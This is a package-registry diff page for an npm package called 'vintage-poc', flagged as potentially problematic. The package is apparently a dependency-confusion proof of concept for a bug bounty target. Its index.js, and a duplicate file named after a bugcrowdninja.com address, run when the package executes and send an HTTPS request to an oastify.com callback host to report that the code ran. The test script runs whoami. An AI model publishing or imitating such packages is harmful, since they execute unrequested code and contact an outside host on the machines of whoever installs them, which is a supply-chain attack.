vintage-poc 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of vintage-poc might be problematic. Click here for more details.
- package/index.js +10 -0
- package/npm +0 -0
- package/package.json +18 -0
- package/vintage@bugcrowdninja.com.js +10 -0
package/index.js
ADDED
@@ -0,0 +1,10 @@
|
|
1
|
+
const https = require('https');
|
2
|
+
|
3
|
+
// Callback to notify of execution
|
4
|
+
const payloadUrl = 'https://tfchwj62imiptx4fk2lsxe5p4ga7yymn.oastify.com/callback';
|
5
|
+
|
6
|
+
https.get(payloadUrl, (res) => {
|
7
|
+
console.log(`Callback sent: ${res.statusCode}`);
|
8
|
+
});
|
9
|
+
|
10
|
+
console.log('PoC package executed!');
|
package/npm
ADDED
File without changes
|
package/package.json
ADDED
@@ -0,0 +1,18 @@
|
|
1
|
+
{
|
2
|
+
"name": "vintage-poc",
|
3
|
+
"version": "1.0.0",
|
4
|
+
"description": "poc for bh********eos",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "whoami"
|
8
|
+
},
|
9
|
+
"repository": {
|
10
|
+
"type": "git",
|
11
|
+
"url": "none"
|
12
|
+
},
|
13
|
+
"keywords": [
|
14
|
+
"poc"
|
15
|
+
],
|
16
|
+
"author": "vintage",
|
17
|
+
"license": "ISC"
|
18
|
+
}
|
@@ -0,0 +1,10 @@
|
|
1
|
+
const https = require('https');
|
2
|
+
|
3
|
+
// Callback to notify of execution
|
4
|
+
const payloadUrl = 'https://tfchwj62imiptx4fk2lsxe5p4ga7yymn.oastify.com/callback';
|
5
|
+
|
6
|
+
https.get(payloadUrl, (res) => {
|
7
|
+
console.log(`Callback sent: ${res.statusCode}`);
|
8
|
+
});
|
9
|
+
|
10
|
+
console.log('PoC package executed!');
|